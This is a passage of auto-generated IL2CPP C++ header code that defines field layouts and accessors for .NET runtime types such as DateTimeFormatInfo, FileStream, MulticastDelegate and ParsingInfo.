___bUseCalendarInfo_49)); } inline bool get_bUseCalendarInfo_49() const { return ___bUseCalendarInfo_49; } inline bool* get_address_of_bUseCalendarInfo_49() { return &___bUseCalendarInfo_49; } inline void set_bUseCalendarInfo_49(bool value) { ___bUseCalendarInfo_49 = value; } inline static int32_t get_offset_of_nDataItem_50() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___nDataItem_50)); } inline int32_t get_nDataItem_50() const { return ___nDataItem_50; } inline int32_t* get_address_of_nDataItem_50() { return &___nDataItem_50; } inline void set_nDataItem_50(int32_t value) { ___nDataItem_50 = value; } inline static int32_t get_offset_of_m_isDefaultCalendar_51() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___m_isDefaultCalendar_51)); } inline bool get_m_isDefaultCalendar_51() const { return ___m_isDefaultCalendar_51; } inline bool* get_address_of_m_isDefaultCalendar_51() { return &___m_isDefaultCalendar_51; } inline void set_m_isDefaultCalendar_51(bool value) { ___m_isDefaultCalendar_51 = value; } inline static int32_t get_offset_of_m_dateWords_53() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___m_dateWords_53)); } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* get_m_dateWords_53() const { return ___m_dateWords_53; } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E** get_address_of_m_dateWords_53() { return &___m_dateWords_53; } inline void set_m_dateWords_53(StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* value) { ___m_dateWords_53 = value; Il2CppCodeGenWriteBarrier((&___m_dateWords_53), value); } inline static int32_t get_offset_of_m_fullTimeSpanPositivePattern_54() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___m_fullTimeSpanPositivePattern_54)); } inline String_t* get_m_fullTimeSpanPositivePattern_54() const { return ___m_fullTimeSpanPositivePattern_54; } inline String_t** get_address_of_m_fullTimeSpanPositivePattern_54() { return &___m_fullTimeSpanPositivePattern_54; } inline void set_m_fullTimeSpanPositivePattern_54(String_t* value) { ___m_fullTimeSpanPositivePattern_54 = value; Il2CppCodeGenWriteBarrier((&___m_fullTimeSpanPositivePattern_54), value); } inline static int32_t get_offset_of_m_fullTimeSpanNegativePattern_55() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___m_fullTimeSpanNegativePattern_55)); } inline String_t* get_m_fullTimeSpanNegativePattern_55() const { return ___m_fullTimeSpanNegativePattern_55; } inline String_t** get_address_of_m_fullTimeSpanNegativePattern_55() { return &___m_fullTimeSpanNegativePattern_55; } inline void set_m_fullTimeSpanNegativePattern_55(String_t* value) { ___m_fullTimeSpanNegativePattern_55 = value; Il2CppCodeGenWriteBarrier((&___m_fullTimeSpanNegativePattern_55), value); } inline static int32_t get_offset_of_m_dtfiTokenHash_57() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F, ___m_dtfiTokenHash_57)); } inline TokenHashValueU5BU5D_t5C8B41D89122FC1D3ED53C946C2656DA03CE899A* get_m_dtfiTokenHash_57() const { return ___m_dtfiTokenHash_57; } inline TokenHashValueU5BU5D_t5C8B41D89122FC1D3ED53C946C2656DA03CE899A** get_address_of_m_dtfiTokenHash_57() { return &___m_dtfiTokenHash_57; } inline void set_m_dtfiTokenHash_57(TokenHashValueU5BU5D_t5C8B41D89122FC1D3ED53C946C2656DA03CE899A* value) { ___m_dtfiTokenHash_57 = value; Il2CppCodeGenWriteBarrier((&___m_dtfiTokenHash_57), value); } }; struct DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F_StaticFields { public: // System.Globalization.DateTimeFormatInfo modreq(System.Runtime.CompilerServices.IsVolatile) System.Globalization.DateTimeFormatInfo::invariantInfo DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___invariantInfo_0; // System.Boolean System.Globalization.DateTimeFormatInfo::preferExistingTokens bool ___preferExistingTokens_46; // System.Collections.Hashtable modreq(System.Runtime.CompilerServices.IsVolatile) System.Globalization.DateTimeFormatInfo::s_calendarNativeNames Hashtable_t978F65B8006C8F5504B286526AEC6608FF983FC9 * ___s_calendarNativeNames_52; // System.Globalization.DateTimeFormatInfo modreq(System.Runtime.CompilerServices.IsVolatile) System.Globalization.DateTimeFormatInfo::s_jajpDTFI DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___s_jajpDTFI_82; // System.Globalization.DateTimeFormatInfo modreq(System.Runtime.CompilerServices.IsVolatile) System.Globalization.DateTimeFormatInfo::s_zhtwDTFI DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___s_zhtwDTFI_83; public: inline static int32_t get_offset_of_invariantInfo_0() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F_StaticFields, ___invariantInfo_0)); } inline DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * get_invariantInfo_0() const { return ___invariantInfo_0; } inline DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** get_address_of_invariantInfo_0() { return &___invariantInfo_0; } inline void set_invariantInfo_0(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * value) { ___invariantInfo_0 = value; Il2CppCodeGenWriteBarrier((&___invariantInfo_0), value); } inline static int32_t get_offset_of_preferExistingTokens_46() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F_StaticFields, ___preferExistingTokens_46)); } inline bool get_preferExistingTokens_46() const { return ___preferExistingTokens_46; } inline bool* get_address_of_preferExistingTokens_46() { return &___preferExistingTokens_46; } inline void set_preferExistingTokens_46(bool value) { ___preferExistingTokens_46 = value; } inline static int32_t get_offset_of_s_calendarNativeNames_52() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F_StaticFields, ___s_calendarNativeNames_52)); } inline Hashtable_t978F65B8006C8F5504B286526AEC6608FF983FC9 * get_s_calendarNativeNames_52() const { return ___s_calendarNativeNames_52; } inline Hashtable_t978F65B8006C8F5504B286526AEC6608FF983FC9 ** get_address_of_s_calendarNativeNames_52() { return &___s_calendarNativeNames_52; } inline void set_s_calendarNativeNames_52(Hashtable_t978F65B8006C8F5504B286526AEC6608FF983FC9 * value) { ___s_calendarNativeNames_52 = value; Il2CppCodeGenWriteBarrier((&___s_calendarNativeNames_52), value); } inline static int32_t get_offset_of_s_jajpDTFI_82() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F_StaticFields, ___s_jajpDTFI_82)); } inline DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * get_s_jajpDTFI_82() const { return ___s_jajpDTFI_82; } inline DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** get_address_of_s_jajpDTFI_82() { return &___s_jajpDTFI_82; } inline void set_s_jajpDTFI_82(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * value) { ___s_jajpDTFI_82 = value; Il2CppCodeGenWriteBarrier((&___s_jajpDTFI_82), value); } inline static int32_t get_offset_of_s_zhtwDTFI_83() { return static_cast<int32_t>(offsetof(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F_StaticFields, ___s_zhtwDTFI_83)); } inline DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * get_s_zhtwDTFI_83() const { return ___s_zhtwDTFI_83; } inline DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** get_address_of_s_zhtwDTFI_83() { return &___s_zhtwDTFI_83; } inline void set_s_zhtwDTFI_83(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * value) { ___s_zhtwDTFI_83 = value; Il2CppCodeGenWriteBarrier((&___s_zhtwDTFI_83), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // DATETIMEFORMATINFO_TF4BB3AA482C2F772D2A9022F78BF8727830FAF5F_H #ifndef HEBREWNUMBERPARSINGCONTEXT_T73104EEB061AFC678110026DD0277C48EAC49B0A_H #define HEBREWNUMBERPARSINGCONTEXT_T73104EEB061AFC678110026DD0277C48EAC49B0A_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Globalization.HebrewNumberParsingContext struct HebrewNumberParsingContext_t73104EEB061AFC678110026DD0277C48EAC49B0A { public: // System.Globalization.HebrewNumber/HS System.Globalization.HebrewNumberParsingContext::state int32_t ___state_0; // System.Int32 System.Globalization.HebrewNumberParsingContext::result int32_t ___result_1; public: inline static int32_t get_offset_of_state_0() { return static_cast<int32_t>(offsetof(HebrewNumberParsingContext_t73104EEB061AFC678110026DD0277C48EAC49B0A, ___state_0)); } inline int32_t get_state_0() const { return ___state_0; } inline int32_t* get_address_of_state_0() { return &___state_0; } inline void set_state_0(int32_t value) { ___state_0 = value; } inline static int32_t get_offset_of_result_1() { return static_cast<int32_t>(offsetof(HebrewNumberParsingContext_t73104EEB061AFC678110026DD0277C48EAC49B0A, ___result_1)); } inline int32_t get_result_1() const { return ___result_1; } inline int32_t* get_address_of_result_1() { return &___result_1; } inline void set_result_1(int32_t value) { ___result_1 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // HEBREWNUMBERPARSINGCONTEXT_T73104EEB061AFC678110026DD0277C48EAC49B0A_H #ifndef CSTREAMREADER_T8B3DE8C991DCFA6F4B913713009C5C9B5E57507D_H #define CSTREAMREADER_T8B3DE8C991DCFA6F4B913713009C5C9B5E57507D_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.IO.CStreamReader struct CStreamReader_t8B3DE8C991DCFA6F4B913713009C5C9B5E57507D : public StreamReader_t62E68063760DCD2FC036AE132DE69C24B7ED001E { public: // System.TermInfoDriver System.IO.CStreamReader::driver TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653 * ___driver_21; public: inline static int32_t get_offset_of_driver_21() { return static_cast<int32_t>(offsetof(CStreamReader_t8B3DE8C991DCFA6F4B913713009C5C9B5E57507D, ___driver_21)); } inline TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653 * get_driver_21() const { return ___driver_21; } inline TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653 ** get_address_of_driver_21() { return &___driver_21; } inline void set_driver_21(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653 * value) { ___driver_21 = value; Il2CppCodeGenWriteBarrier((&___driver_21), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // CSTREAMREADER_T8B3DE8C991DCFA6F4B913713009C5C9B5E57507D_H #ifndef CSTREAMWRITER_T6B662CA496662AF63D81722DCA99094893C80450_H #define CSTREAMWRITER_T6B662CA496662AF63D81722DCA99094893C80450_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.IO.CStreamWriter struct CStreamWriter_t6B662CA496662AF63D81722DCA99094893C80450 : public StreamWriter_t989B894EF3BFCDF6FF5F5F068402A4F835FC8E8E { public: // System.TermInfoDriver System.IO.CStreamWriter::driver TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653 * ___driver_24; public: inline static int32_t get_offset_of_driver_24() { return static_cast<int32_t>(offsetof(CStreamWriter_t6B662CA496662AF63D81722DCA99094893C80450, ___driver_24)); } inline TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653 * get_driver_24() const { return ___driver_24; } inline TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653 ** get_address_of_driver_24() { return &___driver_24; } inline void set_driver_24(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653 * value) { ___driver_24 = value; Il2CppCodeGenWriteBarrier((&___driver_24), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // CSTREAMWRITER_T6B662CA496662AF63D81722DCA99094893C80450_H #ifndef FILESTREAM_TA770BF9AF0906644D43C81B962C7DBC3BC79A418_H #define FILESTREAM_TA770BF9AF0906644D43C81B962C7DBC3BC79A418_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.IO.FileStream struct FileStream_tA770BF9AF0906644D43C81B962C7DBC3BC79A418 : public Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 { public: // System.Byte[] System.IO.FileStream::buf ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* ___buf_6; // System.String System.IO.FileStream::name String_t* ___name_7; // Microsoft.Win32.SafeHandles.SafeFileHandle System.IO.FileStream::safeHandle SafeFileHandle_tE1B31BE63CD11BBF2B9B6A205A72735F32EB1BCB * ___safeHandle_8; // System.Boolean System.IO.FileStream::isExposed bool ___isExposed_9; // System.Int64 System.IO.FileStream::append_startpos int64_t ___append_startpos_10; // System.IO.FileAccess System.IO.FileStream::access int32_t ___access_11; // System.Boolean System.IO.FileStream::owner bool ___owner_12; // System.Boolean System.IO.FileStream::async bool ___async_13; // System.Boolean System.IO.FileStream::canseek bool ___canseek_14; // System.Boolean System.IO.FileStream::anonymous bool ___anonymous_15; // System.Boolean System.IO.FileStream::buf_dirty bool ___buf_dirty_16; // System.Int32 System.IO.FileStream::buf_size int32_t ___buf_size_17; // System.Int32 System.IO.FileStream::buf_length int32_t ___buf_length_18; // System.Int32 System.IO.FileStream::buf_offset int32_t ___buf_offset_19; // System.Int64 System.IO.FileStream::buf_start int64_t ___buf_start_20; public: inline static int32_t get_offset_of_buf_6() { return static_cast<int32_t>(offsetof(FileStream_tA770BF9AF0906644D43C81B962C7DBC3BC79A418, ___buf_6)); } inline ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* get_buf_6() const { return ___buf_6; } inline ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821** get_address_of_buf_6() { return &___buf_6; } inline void set_buf_6(ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* value) { ___buf_6 = value; Il2CppCodeGenWriteBarrier((&___buf_6), value); } inline static int32_t get_offset_of_name_7() { return static_cast<int32_t>(offsetof(FileStream_tA770BF9AF0906644D43C81B962C7DBC3BC79A418, ___name_7)); } inline String_t* get_name_7() const { return ___name_7; } inline String_t** get_address_of_name_7() { return &___name_7; } inline void set_name_7(String_t* value) { ___name_7 = value; Il2CppCodeGenWriteBarrier((&___name_7), value); } inline static int32_t get_offset_of_safeHandle_8() { return static_cast<int32_t>(offsetof(FileStream_tA770BF9AF0906644D43C81B962C7DBC3BC79A418, ___safeHandle_8)); } inline SafeFileHandle_tE1B31BE63CD11BBF2B9B6A205A72735F32EB1BCB * get_safeHandle_8() const { return ___safeHandle_8; } inline SafeFileHandle_tE1B31BE63CD11BBF2B9B6A205A72735F32EB1BCB ** get_address_of_safeHandle_8() { return &___safeHandle_8; } inline void set_safeHandle_8(SafeFileHandle_tE1B31BE63CD11BBF2B9B6A205A72735F32EB1BCB * value) { ___safeHandle_8 = value; Il2CppCodeGenWriteBarrier((&___safeHandle_8), value); } inline static int32_t get_offset_of_isExposed_9() { return static_cast<int32_t>(offsetof(FileStream_tA770BF9AF0906644D43C81B962C7DBC3BC79A418, ___isExposed_9)); } inline bool get_isExposed_9() const { return ___isExposed_9; } inline bool* get_address_of_isExposed_9() { return &___isExposed_9; } inline void set_isExposed_9(bool value) { ___isExposed_9 = value; } inline static int32_t get_offset_of_append_startpos_10() { return static_cast<int32_t>(offsetof(FileStream_tA770BF9AF0906644D43C81B962C7DBC3BC79A418, ___append_startpos_10)); } inline int64_t get_append_startpos_10() const { return ___append_startpos_10; } inline int64_t* get_address_of_append_startpos_10() { return &___append_startpos_10; } inline void set_append_startpos_10(int64_t value) { ___append_startpos_10 = value; } inline static int32_t get_offset_of_access_11() { return static_cast<int32_t>(offsetof(FileStream_tA770BF9AF0906644D43C81B962C7DBC3BC79A418, ___access_11)); } inline int32_t get_access_11() const { return ___access_11; } inline int32_t* get_address_of_access_11() { return &___access_11; } inline void set_access_11(int32_t value) { ___access_11 = value; } inline static int32_t get_offset_of_owner_12() { return static_cast<int32_t>(offsetof(FileStream_tA770BF9AF0906644D43C81B962C7DBC3BC79A418, ___owner_12)); } inline bool get_owner_12() const { return ___owner_12; } inline bool* get_address_of_owner_12() { return &___owner_12; } inline void set_owner_12(bool value) { ___owner_12 = value; } inline static int32_t get_offset_of_async_13() { return static_cast<int32_t>(offsetof(FileStream_tA770BF9AF0906644D43C81B962C7DBC3BC79A418, ___async_13)); } inline bool get_async_13() const { return ___async_13; } inline bool* get_address_of_async_13() { return &___async_13; } inline void set_async_13(bool value) { ___async_13 = value; } inline static int32_t get_offset_of_canseek_14() { return static_cast<int32_t>(offsetof(FileStream_tA770BF9AF0906644D43C81B962C7DBC3BC79A418, ___canseek_14)); } inline bool get_canseek_14() const { return ___canseek_14; } inline bool* get_address_of_canseek_14() { return &___canseek_14; } inline void set_canseek_14(bool value) { ___canseek_14 = value; } inline static int32_t get_offset_of_anonymous_15() { return static_cast<int32_t>(offsetof(FileStream_tA770BF9AF0906644D43C81B962C7DBC3BC79A418, ___anonymous_15)); } inline bool get_anonymous_15() const { return ___anonymous_15; } inline bool* get_address_of_anonymous_15() { return &___anonymous_15; } inline void set_anonymous_15(bool value) { ___anonymous_15 = value; } inline static int32_t get_offset_of_buf_dirty_16() { return static_cast<int32_t>(offsetof(FileStream_tA770BF9AF0906644D43C81B962C7DBC3BC79A418, ___buf_dirty_16)); } inline bool get_buf_dirty_16() const { return ___buf_dirty_16; } inline bool* get_address_of_buf_dirty_16() { return &___buf_dirty_16; } inline void set_buf_dirty_16(bool value) { ___buf_dirty_16 = value; } inline static int32_t get_offset_of_buf_size_17() { return static_cast<int32_t>(offsetof(FileStream_tA770BF9AF0906644D43C81B962C7DBC3BC79A418, ___buf_size_17)); } inline int32_t get_buf_size_17() const { return ___buf_size_17; } inline int32_t* get_address_of_buf_size_17() { return &___buf_size_17; } inline void set_buf_size_17(int32_t value) { ___buf_size_17 = value; } inline static int32_t get_offset_of_buf_length_18() { return static_cast<int32_t>(offsetof(FileStream_tA770BF9AF0906644D43C81B962C7DBC3BC79A418, ___buf_length_18)); } inline int32_t get_buf_length_18() const { return ___buf_length_18; } inline int32_t* get_address_of_buf_length_18() { return &___buf_length_18; } inline void set_buf_length_18(int32_t value) { ___buf_length_18 = value; } inline static int32_t get_offset_of_buf_offset_19() { return static_cast<int32_t>(offsetof(FileStream_tA770BF9AF0906644D43C81B962C7DBC3BC79A418, ___buf_offset_19)); } inline int32_t get_buf_offset_19() const { return ___buf_offset_19; } inline int32_t* get_address_of_buf_offset_19() { return &___buf_offset_19; } inline void set_buf_offset_19(int32_t value) { ___buf_offset_19 = value; } inline static int32_t get_offset_of_buf_start_20() { return static_cast<int32_t>(offsetof(FileStream_tA770BF9AF0906644D43C81B962C7DBC3BC79A418, ___buf_start_20)); } inline int64_t get_buf_start_20() const { return ___buf_start_20; } inline int64_t* get_address_of_buf_start_20() { return &___buf_start_20; } inline void set_buf_start_20(int64_t value) { ___buf_start_20 = value; } }; struct FileStream_tA770BF9AF0906644D43C81B962C7DBC3BC79A418_StaticFields { public: // System.Byte[] System.IO.FileStream::buf_recycle ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* ___buf_recycle_4; // System.Object System.IO.FileStream::buf_recycle_lock RuntimeObject * ___buf_recycle_lock_5; public: inline static int32_t get_offset_of_buf_recycle_4() { return static_cast<int32_t>(offsetof(FileStream_tA770BF9AF0906644D43C81B962C7DBC3BC79A418_StaticFields, ___buf_recycle_4)); } inline ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* get_buf_recycle_4() const { return ___buf_recycle_4; } inline ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821** get_address_of_buf_recycle_4() { return &___buf_recycle_4; } inline void set_buf_recycle_4(ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* value) { ___buf_recycle_4 = value; Il2CppCodeGenWriteBarrier((&___buf_recycle_4), value); } inline static int32_t get_offset_of_buf_recycle_lock_5() { return static_cast<int32_t>(offsetof(FileStream_tA770BF9AF0906644D43C81B962C7DBC3BC79A418_StaticFields, ___buf_recycle_lock_5)); } inline RuntimeObject * get_buf_recycle_lock_5() const { return ___buf_recycle_lock_5; } inline RuntimeObject ** get_address_of_buf_recycle_lock_5() { return &___buf_recycle_lock_5; } inline void set_buf_recycle_lock_5(RuntimeObject * value) { ___buf_recycle_lock_5 = value; Il2CppCodeGenWriteBarrier((&___buf_recycle_lock_5), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // FILESTREAM_TA770BF9AF0906644D43C81B962C7DBC3BC79A418_H #ifndef UNEXCEPTIONALSTREAMREADER_T30F0B3E16EAB998688D1AA23E2A6F3E6590E41EA_H #define UNEXCEPTIONALSTREAMREADER_T30F0B3E16EAB998688D1AA23E2A6F3E6590E41EA_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.IO.UnexceptionalStreamReader struct UnexceptionalStreamReader_t30F0B3E16EAB998688D1AA23E2A6F3E6590E41EA : public StreamReader_t62E68063760DCD2FC036AE132DE69C24B7ED001E { public: public: }; struct UnexceptionalStreamReader_t30F0B3E16EAB998688D1AA23E2A6F3E6590E41EA_StaticFields { public: // System.Boolean[] System.IO.UnexceptionalStreamReader::newline BooleanU5BU5D_t192C7579715690E25BD5EFED47F3E0FC9DCB2040* ___newline_21; // System.Char System.IO.UnexceptionalStreamReader::newlineChar Il2CppChar ___newlineChar_22; public: inline static int32_t get_offset_of_newline_21() { return static_cast<int32_t>(offsetof(UnexceptionalStreamReader_t30F0B3E16EAB998688D1AA23E2A6F3E6590E41EA_StaticFields, ___newline_21)); } inline BooleanU5BU5D_t192C7579715690E25BD5EFED47F3E0FC9DCB2040* get_newline_21() const { return ___newline_21; } inline BooleanU5BU5D_t192C7579715690E25BD5EFED47F3E0FC9DCB2040** get_address_of_newline_21() { return &___newline_21; } inline void set_newline_21(BooleanU5BU5D_t192C7579715690E25BD5EFED47F3E0FC9DCB2040* value) { ___newline_21 = value; Il2CppCodeGenWriteBarrier((&___newline_21), value); } inline static int32_t get_offset_of_newlineChar_22() { return static_cast<int32_t>(offsetof(UnexceptionalStreamReader_t30F0B3E16EAB998688D1AA23E2A6F3E6590E41EA_StaticFields, ___newlineChar_22)); } inline Il2CppChar get_newlineChar_22() const { return ___newlineChar_22; } inline Il2CppChar* get_address_of_newlineChar_22() { return &___newlineChar_22; } inline void set_newlineChar_22(Il2CppChar value) { ___newlineChar_22 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // UNEXCEPTIONALSTREAMREADER_T30F0B3E16EAB998688D1AA23E2A6F3E6590E41EA_H #ifndef UNEXCEPTIONALSTREAMWRITER_T15265DC169F829537681A0A5A1826F6713ABC1CB_H #define UNEXCEPTIONALSTREAMWRITER_T15265DC169F829537681A0A5A1826F6713ABC1CB_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.IO.UnexceptionalStreamWriter struct UnexceptionalStreamWriter_t15265DC169F829537681A0A5A1826F6713ABC1CB : public StreamWriter_t989B894EF3BFCDF6FF5F5F068402A4F835FC8E8E { public: public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // UNEXCEPTIONALSTREAMWRITER_T15265DC169F829537681A0A5A1826F6713ABC1CB_H #ifndef MULTICASTDELEGATE_T_H #define MULTICASTDELEGATE_T_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.MulticastDelegate struct MulticastDelegate_t : public Delegate_t { public: // System.Delegate[] System.MulticastDelegate::delegates DelegateU5BU5D_tDFCDEE2A6322F96C0FE49AF47E9ADB8C4B294E86* ___delegates_11; public: inline static int32_t get_offset_of_delegates_11() { return static_cast<int32_t>(offsetof(MulticastDelegate_t, ___delegates_11)); } inline DelegateU5BU5D_tDFCDEE2A6322F96C0FE49AF47E9ADB8C4B294E86* get_delegates_11() const { return ___delegates_11; } inline DelegateU5BU5D_tDFCDEE2A6322F96C0FE49AF47E9ADB8C4B294E86** get_address_of_delegates_11() { return &___delegates_11; } inline void set_delegates_11(DelegateU5BU5D_tDFCDEE2A6322F96C0FE49AF47E9ADB8C4B294E86* value) { ___delegates_11 = value; Il2CppCodeGenWriteBarrier((&___delegates_11), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif // Native definition for P/Invoke marshalling of System.MulticastDelegate struct MulticastDelegate_t_marshaled_pinvoke : public Delegate_t_marshaled_pinvoke { DelegateU5BU5D_tDFCDEE2A6322F96C0FE49AF47E9ADB8C4B294E86* ___delegates_11; }; // Native definition for COM marshalling of System.MulticastDelegate struct MulticastDelegate_t_marshaled_com : public Delegate_t_marshaled_com { DelegateU5BU5D_tDFCDEE2A6322F96C0FE49AF47E9ADB8C4B294E86* ___delegates_11; }; #endif // MULTICASTDELEGATE_T_H #ifndef OVERFLOWEXCEPTION_TD89571E2350DE06D9DE4AB65ADCA77D607B5693D_H #define OVERFLOWEXCEPTION_TD89571E2350DE06D9DE4AB65ADCA77D607B5693D_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.OverflowException struct OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D : public ArithmeticException_tF9EF5FE94597830EF315C5934258F994B8648269 { public: public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // OVERFLOWEXCEPTION_TD89571E2350DE06D9DE4AB65ADCA77D607B5693D_H #ifndef PARSINGINFO_T7E92EB1D56110F024979E1E497A675BC596BA7B7_H #define PARSINGINFO_T7E92EB1D56110F024979E1E497A675BC596BA7B7_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.ParsingInfo struct ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 { public: // System.Globalization.Calendar System.ParsingInfo::calendar Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * ___calendar_0; // System.Int32 System.ParsingInfo::dayOfWeek int32_t ___dayOfWeek_1; // System.DateTimeParse/TM System.ParsingInfo::timeMark int32_t ___timeMark_2; // System.Boolean System.ParsingInfo::fUseHour12 bool ___fUseHour12_3; // System.Boolean System.ParsingInfo::fUseTwoDigitYear bool ___fUseTwoDigitYear_4; // System.Boolean System.ParsingInfo::fAllowInnerWhite bool ___fAllowInnerWhite_5; // System.Boolean System.ParsingInfo::fAllowTrailingWhite bool ___fAllowTrailingWhite_6; // System.Boolean System.ParsingInfo::fCustomNumberParser bool ___fCustomNumberParser_7; // System.DateTimeParse/MatchNumberDelegate System.ParsingInfo::parseNumberDelegate MatchNumberDelegate_t15412AE1CF0D1909CB05C7DBB8079E9281CCA05D * ___parseNumberDelegate_8; public: inline static int32_t get_offset_of_calendar_0() { return static_cast<int32_t>(offsetof(ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7, ___calendar_0)); } inline Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * get_calendar_0() const { return ___calendar_0; } inline Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 ** get_address_of_calendar_0() { return &___calendar_0; } inline void set_calendar_0(Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * value) { ___calendar_0 = value; Il2CppCodeGenWriteBarrier((&___calendar_0), value); } inline static int32_t get_offset_of_dayOfWeek_1() { return static_cast<int32_t>(offsetof(ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7, ___dayOfWeek_1)); } inline int32_t get_dayOfWeek_1() const { return ___dayOfWeek_1; } inline int32_t* get_address_of_dayOfWeek_1() { return &___dayOfWeek_1; } inline void set_dayOfWeek_1(int32_t value) { ___dayOfWeek_1 = value; } inline static int32_t get_offset_of_timeMark_2() { return static_cast<int32_t>(offsetof(ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7, ___timeMark_2)); } inline int32_t get_timeMark_2() const { return ___timeMark_2; } inline int32_t* get_address_of_timeMark_2() { return &___timeMark_2; } inline void set_timeMark_2(int32_t value) { ___timeMark_2 = value; } inline static int32_t get_offset_of_fUseHour12_3() { return static_cast<int32_t>(offsetof(ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7, ___fUseHour12_3)); } inline bool get_fUseHour12_3() const { return ___fUseHour12_3; } inline bool* get_address_of_fUseHour12_3() { return &___fUseHour12_3; 